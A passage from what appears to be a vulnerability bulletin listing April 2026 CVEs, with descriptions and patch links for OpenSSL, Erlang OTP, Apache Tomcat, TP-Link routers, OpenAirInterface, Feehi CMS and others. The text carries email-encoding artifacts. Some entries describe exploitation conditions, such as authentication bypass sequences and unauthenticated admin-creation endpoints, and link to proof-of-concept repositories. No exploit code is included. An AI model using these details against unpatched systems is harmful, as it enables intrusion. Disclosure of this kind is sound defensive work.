.0 are not affected by this issue, as the affected code is outside the Open= SSL FIPS module boundary. 2026-04-07 not yet calculated CVE-2026-28388 [ ht= tps://www.cve.org/CVERecord?id=3DCVE-2026-28388 ] OpenSSL Advisory [ https:= //openssl-library.org/news/secadv/20260407.txt ]
3.6.2 git commit [ https://github.com/openssl/openssl/commit/602542f2c0c2d5= edb47128f93eac10b62aeeefb3 ]
3.5.6 git commit [ https://github.com/openssl/openssl/commit/d3a901e8d9f021= f3e67d6cfbc12e768129862726 ]
3.4.5 git commit [ https://github.com/openssl/openssl/commit/a9d187dd100013= 0100fa7ab915f8513532cb3bb8 ]
3.3.7 git commit [ https://github.com/openssl/openssl/commit/5a0b4930779cd2= 408880979db765db919da55139 ]
3.0.20 git commit [ https://github.com/openssl/openssl/commit/59c3b3158553a= b53275bbbccca5cb305d591cf2e ]
=C2=A0 OpenSSL--OpenSSL Issue summary: During processing of a crafted CMS E= nvelopedData message with KeyAgreeRecipientInfo a NULL pointer dereference = can happen. Impact summary: Applications that process attacker-controlled C=
MS data may crash before authentication or cryptographic operations occur r= esulting in Denial of Service. When a CMS EnvelopedData message that uses K= eyAgreeRecipientInfo is processed, the optional parameters field of KeyEncr= yptionAlgorithmIdentifier is examined without checking for its presence. Th=
is results in a NULL pointer dereference if the field is missing. Applicati= ons and services that call CMS_decrypt() on untrusted input (e.g., S/MIME p= rocessing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, = 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code =
is outside the OpenSSL FIPS module boundary. 2026-04-07 not yet calculated = CVE-2026-28389 [ https://www.cve.org/CVERecord?id=3DCVE-2026-28389 ] OpenSS=
L Advisory [ https://openssl-library.org/news/secadv/20260407.txt ]
3.6.2 git commit [ https://github.com/openssl/openssl/commit/f80f83bc5fd036= bc47d773e8b15a001e2b4ce686 ]
3.5.6 git commit [ https://github.com/openssl/openssl/commit/16cea4188e0ea5= 67deb4f93f85902247e67384f5 ]
3.4.5 git commit [ https://github.com/openssl/openssl/commit/785cbf7ea3b5a6= f5adf0c1ccb92b79d89c35c616 ]
3.3.7 git commit [ https://github.com/openssl/openssl/commit/c6725634e089eb= 2b634b10ede33944be7248172a ]
3.0.20 git commit [ https://github.com/openssl/openssl/commit/7b5274e812400= cacb6f3be4c2df5340923fa807f ]
=C2=A0 OpenSSL--OpenSSL Issue summary: During processing of a crafted CMS E= nvelopedData message with KeyTransportRecipientInfo a NULL pointer derefere= nce can happen. Impact summary: Applications that process attacker-controll=
ed CMS data may crash before authentication or cryptographic operations occ=
ur resulting in Denial of Service. When a CMS EnvelopedData message that us=
es KeyTransportRecipientInfo with RSA-OAEP encryption is processed, the opt= ional parameters field of RSA-OAEP SourceFunc algorithm identifier is exami= ned without checking for its presence. This results in a NULL pointer deref= erence if the field is missing. Applications and services that call CMS_dec= rypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) = are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affe= cted by this issue, as the affected code is outside the OpenSSL FIPS module=
boundary. 2026-04-07 not yet calculated CVE-2026-28390 [ https://www.cve.o= rg/CVERecord?id=3DCVE-2026-28390 ] OpenSSL Advisory [ https://openssl-libra= ry.org/news/secadv/20260407.txt ]
3.6.2 git commit [ https://github.com/openssl/openssl/commit/01194a8f194111= 5cd0383bfa91c736dd3993c8bc ]
3.5.6 git commit [ https://github.com/openssl/openssl/commit/2e39b7a6993be4= 45fddb9fbce316fa756e0397b6 ]
3.4.5 git commit [ https://github.com/openssl/openssl/commit/ea7b4ea4f9f853= 521ba34830cbcadc970d2e0788 ]
3.3.7 git commit [ https://github.com/openssl/openssl/commit/fd2f1a6cf53b9c= eeca723a001aa4b825d7c7ee75 ]
3.0.20 git commit [ https://github.com/openssl/openssl/commit/af2a5fecd3e71= a29e7568f9c1453dec5cebbaff4 ]
=C2=A0 Japan Computer Emergency Response Team Coordination Center (JPCERT/C= C)--Emocheck Emocheck insecurely loads Dynamic Link Libraries (DLLs). If a = crafted DLL file is placed to the same directory, an arbitrary code may be = executed with the privilege of the user invoking EmoCheck. 2026-04-10 not y=
et calculated CVE-2026-28704 [ https://www.cve.org/CVERecord?id=3DCVE-2026-= 28704 ] https://www.jpcert.or.jp/press/2026/PR20260410.html https://github.com/JPCERTCC/EmoCheck/
https://jvn.jp/en/jp/JVN00263243/
=C2=A0 Erlang--OTP Incorrect Authorization vulnerability in Erlang OTP (ine=
ts modules) allows unauthenticated access to CGI scripts protected by direc= tory rules when served via script_alias. When script_alias maps a URL prefi=
x to a directory outside DocumentRoot, mod_auth evaluates directory-based a= ccess controls against the DocumentRoot-relative path while mod_cgi execute=
s the script at the ScriptAlias-resolved path. This path mismatch allows un= authenticated access to CGI scripts that directory rules were meant to prot= ect. This vulnerability is associated with program files lib/inets/src/http= _server/mod_alias.erl, lib/inets/src/http_server/mod_auth.erl, and lib/inet= s/src/http_server/mod_cgi.erl. This issue affects OTP from OTP 17.0 until O=
TP 28.4.2, 27.3.4.10 and 26.2.5.19 corresponding to inets from 5.10 until 9= .6.2, 9.3.2.4 and 9.1.0.6. 2026-04-07 not yet calculated CVE-2026-28808 [ h= ttps://www.cve.org/CVERecord?id=3DCVE-2026-28808 ] https://github.com/erlan= g/otp/security/advisories/GHSA-3vhp-h532-mc3f https://cna.erlef.org/cves/CVE-2026-28808.html https://osv.dev/vulnerability/EEF-CVE-2026-28808 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/8fc71ac6af4fbcc54103bec2983ef22e829426=
88
https://github.com/erlang/otp/commit/9dfa0c51eac97866078e808dec2183cb7871ff=
7c
=C2=A0 Erlang--OTP Generation of Predictable Numbers or Identifiers vulnera= bility in Erlang/OTP kernel (inet_res, inet_db modules) allows DNS Cache Po= isoning. The built-in DNS resolver (inet_res) uses a sequential, process-gl= obal 16-bit transaction ID for UDP queries and does not implement source po=
rt randomization. Response validation relies almost entirely on this ID, ma= king DNS cache poisoning practical for an attacker who can observe one quer=
y or predict the next ID. This conflicts with RFC 5452 recommendations for = mitigating forged DNS answers. inet_res is intended for use in trusted netw= ork environments and with trusted recursive resolvers. Earlier documentatio=
n did not clearly state this deployment assumption, which could lead users =
to deploy the resolver in environments where spoofed DNS responses are poss= ible. This vulnerability is associated with program files lib/kernel/src/in= et_db.erl and lib/kernel/src/inet_res.erl. This issue affects OTP from OTP = 17.0 until OTP 28.4.2, 27.3.4.10 and 26.2.5.19 corresponding to kernel from=
3.0 until 10.6.2, 10.2.7.4 and 9.2.4.11. 2026-04-07 not yet calculated CVE= -2026-28810 [ https://www.cve.org/CVERecord?id=3DCVE-2026-28810 ] https://g= ithub.com/erlang/otp/security/advisories/GHSA-v884-5jg5-whj8 https://cna.erlef.org/cves/CVE-2026-28810.html https://osv.dev/vulnerability/EEF-CVE-2026-28810 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/36f23c9d2cc54afe83671dd7343596d7972839=
a5
https://github.com/erlang/otp/commit/dd15e8eb03548c5e55e9915f0e91389ec6bad9=
fd
https://github.com/erlang/otp/commit/b057a9d995017b1be50d6dc02edd52382f3231=
b8
=C2=A0 Apache Software Foundation--Apache Tomcat Configured cipher preferen=
ce order not preserved vulnerability in Apache Tomcat. This issue affects A= pache Tomcat: from 11.0.16 through 11.0.18, from 10.1.51 through 10.1.52, f= rom 9.0.114 through 9.0.115. Users are recommended to upgrade to version 11= .0.20, 10.1.53 or 9.0.116, which fix the issue. 2026-04-09 not yet calculat=
ed CVE-2026-29129 [ https://www.cve.org/CVERecord?id=3DCVE-2026-29129 ] htt= ps://lists.apache.org/thread/r4h1t6f8xhxsxfm6c2z5cprolsosho3f
=C2=A0 Apache Software Foundation--Apache Tomcat CLIENT_CERT authentication=
does not fail as expected for some scenarios when soft fail is disabled vu= lnerability in Apache Tomcat, Apache Tomcat Native. This issue affects Apac=
he Tomcat: from 11.0.0-M1 through 11.0.18, from 10.1.0-M7 through 10.1.52, = from 9.0.83 through 9.0.115; Apache Tomcat Native: from 1.1.23 through 1.1.= 34, from 1.2.0 through 1.2.39, from 1.3.0 through 1.3.6, from 2.0.0 through=
2.0.13. Users are recommended to upgrade to version Tomcat Native 1.3.7 or=
2.0.14 and Tomcat 11.0.20, 10.1.53 and 9.0.116, which fix the issue. 2026-= 04-09 not yet calculated CVE-2026-29145 [ https://www.cve.org/CVERecord?id= =3DCVE-2026-29145 ] https://lists.apache.org/thread/yz5fxmhd2j43wgqykssdo7k= ltws57jfz
=C2=A0 Apache Software Foundation--Apache Tomcat Padding Oracle vulnerabili=
ty in Apache Tomcat's EncryptInterceptor with default configuration. This i= ssue affects Apache Tomcat: from 11.0.0-M1 through 11.0.18, from 10.0.0-M1 = through 10.1.52, from 9.0.13 through 9..115, from 8.5.38 through 8.5.100, f= rom 7.0.100 through 7.0.109. Users are recommended to upgrade to version 11= .0.19, 10.1.53 and 9.0.116, which fixes the issue. 2026-04-09 not yet calcu= lated CVE-2026-29146 [ https://www.cve.org/CVERecord?id=3DCVE-2026-29146 ] = https://lists.apache.org/thread/lzt04z2pb3dc5tk85obn80xygw3z1p0w
=C2=A0 n/a--n/a PHP-MYSQL-User-Login-System v1.0 was discovered to contain =
a SQL injection vulnerability via the username parameter at login.php. 2026= -04-10 not yet calculated CVE-2026-29861 [ https://www.cve.org/CVERecord?id= =3DCVE-2026-29861 ] https://github.com/amanyadav78/CVE-2026-29861
=C2=A0 Entechtaiwan[.]com =E2=80=93 PowerStrip The pstrip64.sys driver in E= nTech Taiwan PowerStrip <=3D3.90.736 allows local users to escalate privile= ges to SYSTEM via a crafted IOCTL request enabling unprivileged users to ma=
p arbitrary physical memory into their address space and modify critical ke= rnel structures. 2026-04-09 not yet calculated CVE-2026-29923 [ https://www= .cve.org/CVERecord?id=3DCVE-2026-29923 ] https://entechtaiwan.com/util/ps.s= htm
https://packetstorm.news/files/id/218394/
=C2=A0 n/a-- OpenAirInterface OpenAirInterface Version 2.2.0 has a Buffer O= verflow vulnerability in processing UplinkNASTransport containing Authentic= ation Response containing a NAS PDU with oversize response (For example 100=
byte). The response is decoded by AMF and passed to the AUSF component for=
verification. AUSF crashes on receiving this oversize response. This can p= rohibit users from further registration and verification and can cause Deni=
al of Services (DoS). 2026-04-08 not yet calculated CVE-2026-30075 [ https:= //www.cve.org/CVERecord?id=3DCVE-2026-30075 ] https://gitlab.eurecom.fr/oai= /cn5g/oai-cn5g-ausf/-/issues?show=3DeyJpaWQiOiI2IiwiZnVsbF9wYXRoIjoib2FpL2N= uNWcvb2FpLWNuNWctYXVzZiIsImlkIjo1NDE5fQ%3D%3D https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues/6
=C2=A0 n/a-- OpenAirInterface OpenAirInterface V2.2.0 AMF crashes when it r= eceives an NGAP message with invalid procedure code or invalid PDU-type. Fo=
r example when the message specification requires InitiatingMessage but sen=
t with successfulOutcome. 2026-04-06 not yet calculated CVE-2026-30078 [ ht= tps://www.cve.org/CVERecord?id=3DCVE-2026-30078 ] https://gitlab.eurecom.fr= /oai/cn5g/oai-cn5g-amf/-/issues/74 https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/merge_requests/414
=C2=A0 n/a-- OpenAirInterface In OpenAirInterface V2.2.0 AMF, Out of sequen=
ce messages causes incorrect state transition during UE registration proced= ure. This allows authentication to be bypassed completely. If a SecurityMod= eComplete message is sent after InitialUERegistration, a registration rejec=
t is received followed by a registration accept! This leads the UE to be re= gistered without proper authentication. 2026-04-07 not yet calculated CVE-2= 026-30079 [ https://www.cve.org/CVERecord?id=3DCVE-2026-30079 ] https://git= lab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/77
=C2=A0 n/a-- OpenAirInterface OpenAirInterface v2.2.0 accepts Security Mode=
Complete without any integrity protection. Configuration has supported int= egrity NIA1 and NIA2. But if an UE sends initial registration request with = only security capability IA0, OpenAirInterface accepts and proceeds. This d= owngrade security context can lead to the possibility of replay attack. 202= 6-04-08 not yet calculated CVE-2026-30080 [ https://www.cve.org/CVERecord?i= d=3DCVE-2026-30080 ] https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issu= es/78
=C2=A0 chartbrew--chartbrew Chartbrew is an open-source web application tha=
t can connect directly to databases and APIs and use the data to create cha= rts. Prior to 4.8.5, Chartbrew allows authenticated users to create API dat=
a connections with arbitrary URLs. The server fetches these URLs using requ= est-promise without any IP address validation, enabling Server-Side Request=
Forgery attacks against internal networks and cloud metadata endpoints. Th=
is vulnerability is fixed in 4.8.5. 2026-04-10 not yet calculated CVE-2026-= 30232 [ https://www.cve.org/CVERecord?id=3DCVE-2026-30232 ] https://github.= com/chartbrew/chartbrew/security/advisories/GHSA-p4rg-967r-w4cv https://github.com/chartbrew/chartbrew/commit/9c4a7e2b02acb25f0782bd4ac1f16= 407d59c2df1
=C2=A0 n/a-- Daylight Studio FuelCMS Daylight Studio FuelCMS v1.5.2 was dis= covered to contain an authenticated remote code execution (RCE) vulnerabili=
ty in the Blocks module. 2026-04-07 not yet calculated CVE-2026-30460 [ htt= ps://www.cve.org/CVERecord?id=3DCVE-2026-30460 ] https://github.com/dayligh= tstudio/FUEL-CMS/
http://daylight.com
http://fuelcms.com https://pentest-tools.com/PTT-2025-027-Improper-Authorization.pdf
=C2=A0 Ms4w[.]com -- GatewayGeo Mapserver=C2=A0 A Dynamic-link Library Inje= ction vulnerability in GatewayGeo MapServer for Windows version 5 allows at= tackers to escalate privileges via a crafted executable. 2026-04-09 not yet=
calculated CVE-2026-30478 [ https://www.cve.org/CVERecord?id=3DCVE-2026-30= 478 ] https://ms4w.com https://github.com/penjaminTester/Research/tree/main/CVE-2026-30478
=C2=A0 Ms4w[.]com -- GatewayGeo Mapserver=C2=A0 A Dynamic-link Library Inje= ction vulnerability in OSGeo Project MapServer before v8.0 allows attackers=
to execute arbitrary code via a crafted executable. 2026-04-09 not yet cal= culated CVE-2026-30479 [ https://www.cve.org/CVERecord?id=3DCVE-2026-30479 =
] https://mapserver.org/index.html https://github.com/penjaminTester/Research/tree/main/CVE-2026-30479
=C2=A0 Aziot[.]life -- AZIOT 1 Node Smart Switch An information disclosure = vulnerability exists in AZIOT 1 Node Smart Switch (16amp)- WiFi/Bluetooth E= nabled Software Version: 1.1.9 due to improper access control on the UART d= ebug interface. An attacker with physical access can connect to the UART in= terface and obtain sensitive information from the serial console without au= thentication. 2026-04-06 not yet calculated CVE-2026-30613 [ https://www.cv= e.org/CVERecord?id=3DCVE-2026-30613 ] http://aziot.com https://github.com/dumbermore/tuya/blob/main/README.md
=C2=A0 TP-Link Systems Inc.--AX53 v1.0 A stack-based buffer overflow in the=
tmpServer module of TP-Link Archer AX53 v1.0=C2=A0allows an authenticated = adjacent attacker to trigger a segmentation fault and potentially execute a= rbitrary code via a specially crafted configuration file. Successful exploi= tation may cause a crash and could allow arbitrary code execution, enabling=
modification of device state, exposure of sensitive data, or further compr= omise of device integrity. This issue affects AX53 v1.0: before 1.7.1 Build=
20260213. 2026-04-08 not yet calculated CVE-2026-30814 [ https://www.cve.o= rg/CVERecord?id=3DCVE-2026-30814 ] https://www.tp-link.com/my/support/downl= oad/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/
=C2=A0 TP-Link Systems Inc.--AX53 v1.0 An OS command injection vulnerabilit=
y in the OpenVPN module of TP-Link Archer AX53 v1.0=C2=A0allows an authenti= cated adjacent attacker to execute system commands when a specially crafted=
configuration file is processed=C2=A0due to insufficient input validation.=
Successful exploitation may allow modification of configuration files, dis= closure of sensitive information, or further compromise of device integrity=
. This issue affects AX53 v1.0: before 1.7.1 Build 20260213. 2026-04-08 not=
yet calculated CVE-2026-30815 [ https://www.cve.org/CVERecord?id=3DCVE-202= 6-30815 ] https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmw= are
https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/
=C2=A0 TP-Link Systems Inc.--AX53 v1.0 An external control of configuration=
vulnerability in the OpenVPN module=C2=A0of TP-Link AX53 v1.0=C2=A0allows =
an authenticated adjacent attacker to read arbitrary file when a malicious = configuration file is processed.=C2=A0 Successful exploitation may allow un= authorized access to arbitrary files on the device, potentially exposing se= nsitive information.This issue affects AX53 v1.0: before 1.7.1 Build 202602= 13. 2026-04-08 not yet calculated CVE-2026-30816 [ https://www.cve.org/CVER= ecord?id=3DCVE-2026-30816 ] https://www.tp-link.com/my/support/download/arc= her-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/
=C2=A0 TP-Link Systems Inc.--AX53 v1.0 An external configuration control vu= lnerability in the OpenVPN module=C2=A0of TP-Link AX53 v1.0=C2=A0allows an = authenticated adjacent attacker to read arbitrary files when a malicious co= nfiguration file is processed. Successful exploitation may allow unauthoriz=
ed access to arbitrary files on the device, potentially exposing sensitive = information.This issue affects AX53 v1.0: before 1.7.1 Build 20260213. 2026= -04-08 not yet calculated CVE-2026-30817 [ https://www.cve.org/CVERecord?id= =3DCVE-2026-30817 ] https://www.tp-link.com/my/support/download/archer-ax53= /v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/
=C2=A0 TP-Link Systems Inc.--AX53 v1.0 An OS command injection vulnerabilit=
y in the dnsmasq module of TP-Link Archer AX53 v1.0 allows an authenticated=
adjacent attacker to execute arbitrary code when a specially crafted confi= guration file is processed due to insufficient input validation. Successful=
exploitation may allow the attacker to modify device configuration, access=
sensitive information, or further compromise system integrity. This issue = affects AX53 v1.0: before 1.7.1 Build 20260213. 2026-04-08 not yet calculat=
ed CVE-2026-30818 [ https://www.cve.org/CVERecord?id=3DCVE-2026-30818 ] htt= ps://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/
=C2=A0 n/a--n/a A Server-Side Request Forgery (SSRF) vulnerability exists i=
n the Print Format functionality of ERPNext v16.0.1 and Frappe Framework v1= 6.1.1, where user-supplied HTML is insufficiently sanitized before being re= ndered into PDF. When generating PDFs from user-controlled HTML content, th=
e application allows the inclusion of HTML elements such as <iframe> that r= eference external resources. The PDF rendering engine automatically fetches=
these resources on the server side. An attacker can abuse this behavior to=
force the server to make arbitrary HTTP requests to internal services, inc= luding cloud metadata endpoints, potentially leading to sensitive informati=
on disclosure. 2026-04-08 not yet calculated CVE-2026-31017 [ https://www.c= ve.org/CVERecord?id=3DCVE-2026-31017 ] http://frappe.com https://github.com/PhDg1410/CVE/tree/main/CVE-2026-31017
=C2=A0 n/a--n/a A vulnerability was identified in stata-mcp prior to v1.13.=
0 where insufficient validation of user-supplied Stata do-file content can = lead to command execution. 2026-04-08 not yet calculated CVE-2026-31040 [ h= ttps://www.cve.org/CVERecord?id=3DCVE-2026-31040 ] https://github.com/Sepin= eTam/stata-mcp/issues/20
https://github.com/SepineTam/stata-mcp/pull/21 https://github.com/SepineTam/stata-mcp/commit/52413ce https://github.com/SepineTam/stata-mcp/releases/tag/v1.13.0
=C2=A0 n/a--n/a A double free vulnerability exists in librz/bin/format/le/l= e.c in the function le_load_fixup_record(). When processing malformed or ci= rcular LE fixup chains, relocation entries may be freed multiple times duri=
ng error handling. A specially crafted LE binary can trigger heap corruptio=
n and cause the application to crash, resulting in a denial-of-service cond= ition. An attacker with a crafted binary could cause a denial of service wh=
en the tool is integrated on a service pipeline. 2026-04-06 not yet calcula= ted CVE-2026-31053 [ https://www.cve.org/CVERecord?id=3DCVE-2026-31053 ] ht= tps://github.com/rizinorg/rizin/issues/5753 https://github.com/rizinorg/rizin/pull/5795
=C2=A0 n/a-- Aggressive HiPER Router 1200GW UTT Aggressive HiPER 1200GW v2.= 5.3-170306 was discovered to contain a buffer overflow in the timeRangeName=
parameter of the formConfigDnsFilterGlobal function. This vulnerability al= lows attackers to cause a Denial of Service (DoS) via a crafted input. 2026= -04-06 not yet calculated CVE-2026-31058 [ https://www.cve.org/CVERecord?id= =3DCVE-2026-31058 ] https://github.com/zxq0408/Vul202601/blob/main/2.md
=C2=A0 n/a-- Aggressive HiPER Router 520W A remote command execution (RCE) = vulnerability in the /goform/formDia component of UTT Aggressive HiPER 520W=
v3v1.7.7-180627 allows attackers to execute arbitrary commands via a craft=
ed string. 2026-04-06 not yet calculated CVE-2026-31059 [ https://www.cve.o= rg/CVERecord?id=3DCVE-2026-31059 ] https://github.com/zxq0408/Vul202601/blo= b/main/9.md
=C2=A0 n/a-- Aggressive HiPER Router 810G UTT Aggressive HiPER 810G v3v1.7.= 7-171114 was discovered to contain a buffer overflow in the notes parameter=
of the formGroupConfig function. This vulnerability allows attackers to ca= use a Denial of Service (DoS) via a crafted input. 2026-04-06 not yet calcu= lated CVE-2026-31060 [ https://www.cve.org/CVERecord?id=3DCVE-2026-31060 ] = https://github.com/zxq0408/Vul202601/blob/main/5.md
=C2=A0 n/a-- Aggressive HiPER Router 810G UTT Aggressive HiPER 810G v3v1.7.= 7-171114 was discovered to contain a buffer overflow in the timestart param= eter of the ConfigAdvideo function. This vulnerability allows attackers to = cause a Denial of Service (DoS) via a crafted input. 2026-04-06 not yet cal= culated CVE-2026-31061 [ https://www.cve.org/CVERecord?id=3DCVE-2026-31061 =
] https://github.com/zxq0408/Vul202601/blob/main/1.md
=C2=A0 n/a-- Aggressive HiPER Router 510W UTT Aggressive 520W v3v1.7.7-1806=
27 was discovered to contain a buffer overflow in the filename parameter of=
the formFtpServerDirConfig function. This vulnerability allows attackers t=
o cause a Denial of Service (DoS) via a crafted input. 2026-04-06 not yet c= alculated CVE-2026-31062 [ https://www.cve.org/CVERecord?id=3DCVE-2026-3106=
2 ] https://github.com/zxq0408/Vul202601/blob/main/7.md
=C2=A0 n/a-- Aggressive HiPER Router 1200GW UTT Aggressive HiPER 1200GW v2.= 5.3-170306 was discovered to contain a buffer overflow in the pools paramet=
er of the formArpBindConfig function. This vulnerability allows attackers t=
o cause a Denial of Service (DoS) via a crafted input. 2026-04-06 not yet c= alculated CVE-2026-31063 [ https://www.cve.org/CVERecord?id=3DCVE-2026-3106=
3 ] https://github.com/zxq0408/Vul202601/blob/main/4.md
=C2=A0 n/a-- Aggressive HiPER Router 520W UTT Aggressive 520W v3v1.7.7-1806=
27 was discovered to contain a buffer overflow in the addCommand parameter =
of the formConfigCliForEngineerOnly function. This vulnerability allows att= ackers to cause a Denial of Service (DoS) via a crafted input. 2026-04-06 n=
ot yet calculated CVE-2026-31065 [ https://www.cve.org/CVERecord?id=3DCVE-2= 026-31065 ] https://github.com/zxq0408/Vul202601/blob/main/8.md
=C2=A0 n/a-- Aggressive HiPER Router 810G UTT Aggressive HiPER 810G v3v1.7.= 7-171114 was discovered to contain a buffer overflow in the selDateType par= ameter of the formTaskEdit function. This vulnerability allows attackers to=
cause a Denial of Service (DoS) via a crafted input. 2026-04-06 not yet ca= lculated CVE-2026-31066 [ https://www.cve.org/CVERecord?id=3DCVE-2026-31066=
] https://github.com/zxq0408/Vul202601/blob/main/6.md
=C2=A0 n/a-- UTT Aggressive 520W A remote command execution (RCE) vulnerabi= lity in the /goform/formReleaseConnect component of UTT Aggressive 520W v3v= 1.7.7-180627 allows attackers to execute arbitrary commands via a crafted s= tring. 2026-04-06 not yet calculated CVE-2026-31067 [ https://www.cve.org/C= VERecord?id=3DCVE-2026-31067 ] https://github.com/zxq0408/Vul202601/blob/ma= in/10.md
=C2=A0 n/a-- Kaleris YMS Incorrect access control in Kaleris YMS v7.2.2.1 a= llows authenticated attackers with only the shipping/receiving role to view=
the truck's dashboard resources. 2026-04-06 not yet calculated CVE-2026-31= 150 [ https://www.cve.org/CVERecord?id=3DCVE-2026-31150 ] https://kaleris.c= om/solutions/yard-management/ https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31150
=C2=A0 n/a-- Kaleris YMS An issue in the login mechanism of Kaleris YMS v7.= 2.2.1 allows attackers to bypass login verification to access the applicati=
on 's resources. 2026-04-06 not yet calculated CVE-2026-31151 [ https://www= .cve.org/CVERecord?id=3DCVE-2026-31151 ] https://kaleris.com/solutions/yard= -management/
https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31151
=C2=A0 Bynder[.]com -- Bynder v0.1.394 A stored cross-site scripting (XSS) = vulnerability in Bynder v0.1.394 allows attackers to execute arbitrary web = scripts or HTML via a crafted payload. 2026-04-06 not yet calculated CVE-20= 26-31153 [ https://www.cve.org/CVERecord?id=3DCVE-2026-31153 ] https://www.= bynder.com/en/
https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31153
=C2=A0 Totolink[.]net -- A3300R router An issue was discovered in ToToLink = A3300R firmware v17.0.0cu.557_B20221024 allowing attackers to execute arbit= rary commands via the stun-pass parameter to /cgi-bin/cstecgi.cgi. 2026-04-=
09 not yet calculated CVE-2026-31170 [ https://www.cve.org/CVERecord?id=3DC= VE-2026-31170 ] https://github.com/Svigo-o/TOTOLINK-Vul/tree/main/totolink-= a3300r-stun-pass-cmd-injection
=C2=A0 Altenar[.]com -- Sportsbook Software Platform SB2 v.2.0 Cross Site S= cripting vulnerability in Altenar Sportsbook Software Platform (SB2) v.2.0 = allows a remote attacker to obtain sensitive information and execute arbitr= ary code via the URL parameter 2026-04-10 not yet calculated CVE-2026-31262=
[ https://www.cve.org/CVERecord?id=3DCVE-2026-31262 ] https://github.com/n= ikolas-ch/CVEs/tree/main/Altenar_SportsBook_Platform_SB2/ORtoXSS https://github.com/nikolas-ch/CVEs/blob/main/Altenar_SportsBook_Platform_SB= 2/ORtoXSS/ORtoXSS.txt
=C2=A0 n/a--n/a megagao production_ssm v1.0 contains an authorization bypas=
s vulnerability in the user addition functionality. The insert() method in = UserController.java lacks authentication checks, allowing unauthenticated a= ttackers to create super administrator accounts by directly accessing the /= user/insert endpoint. This leads to complete system compromise. 2026-04-07 = not yet calculated CVE-2026-31271 [ https://www.cve.org/CVERecord?id=3DCVE-= 2026-31271 ] https://github.com/clockw1se0v0/Vul/blob/main/production_ssm/U= nauthorized.md
=C2=A0 n/a--n/a MRCMS 3.1.2 contains an access control vulnerability. The s= ave() method in src/main/java/org/marker/mushroom/controller/UserController= .java lacks proper authorization validation, enabling direct addition of su= per administrator accounts without authentication. 2026-04-07 not yet calcu= lated CVE-2026-31272 [ https://www.cve.org/CVERecord?id=3DCVE-2026-31272 ] = https://github.com/clockw1se0v0/Vul/blob/main/MRCMS/Unauthorized.md
=C2=A0 n/a-- Feehi CMS An authenticated stored cross-site scripting (XSS) v= ulnerability in the creation/editing module of Feehi CMS v2.1.1 allows atta= ckers to execute arbitrary web scripts or HTML via injecting a crafted payl= oad into the Content field. 2026-04-06 not yet calculated CVE-2026-31313 [ = https://www.cve.org/CVERecord?id=3DCVE-2026-31313 ] http://feehi.com https://github.com/liufee/cms/issues/80
=C2=A0 n/a-- Feehi CMS An authenticated stored cross-site scripting (XSS) v= ulnerability in Feehi CMS v2.1.1 allows attackers to execute arbitrary web = scripts or HTML via injecting a crafted payload into the Page Sign paramete=
r. 2026-04-06 not yet calculated CVE-2026-31350 [ https://www.cve.org/CVERe= cord?id=3DCVE-2026-31350 ] https://github.com/liufee/cms https://github.com/liufee/cms/issues/82
=C2=A0 n/a-- Feehi CMS An authenticated stored cross-site scripting (XSS) v= ulnerability in the creation/editing module of Feehi CMS v2.1.1 allows atta= ckers to execute arbitrary web scripts or HTML via injecting a crafted payl= oad into the Title parameter. 2026-04-06 not yet calculated CVE-2026-31351 =
[ https://www.cve.org/CVERecord?id=3DCVE-2026-31351 ] https://github.com/li= ufee/cms
https://github.com/liufee/cms/issues/81
=C2=A0 n/a-- Feehi CMS An authenticated stored cross-site scripting (XSS) v= ulnerability in the Role Management module of Feehi CMS v2.1.1 allows attac= kers to execute arbitrary web scripts or HTML via injecting a crafted paylo=
ad into the Role Name parameter. 2026-04-06 not yet calculated CVE-2026-313=
52 [ https://www.cve.org/CVERecord?id=3DCVE-2026-31352 ] https://github.com= /liufee/cms
https://github.com/liufee/cms/issues/83
=C2=A0 n/a-- Feehi CMS An authenticated stored cross-site scripting (XSS) v= ulnerability in the Category module of Feehi CMS v2.1.1 allows attackers to=
execute arbitrary web scripts or HTML via injecting a crafted payload into=
the Name parameter. 2026-04-06 not yet calculated CVE-2026-31353 [ https:/= /www.cve.org/CVERecord?id=3DCVE-2026-31353 ] https://github.com/liufee/cms https://github.com/liufee/cms/issues/84
=C2=A0 n/a-- Feehi CMS Multiple authenticated stored cross-site scripting (= XSS) vulnerabilities in the Permissions module of Feehi CMS v2.1.1 allows a= ttackers to execute arbitrary web scripts or HTML via injecting a crafted p= ayload into the Group, Category or Description parameters. 2026-04-06 not y=
et calculated CVE-2026-31354 [ https://www.cve.org/CVERecord?id=3DCVE-2026-= 31354 ] https://github.com/liufee/cms
https://github.com/liufee/cms/issues/85
=C2=A0 Linux--Linux In the Linux kernel, the following vulnerability has be=
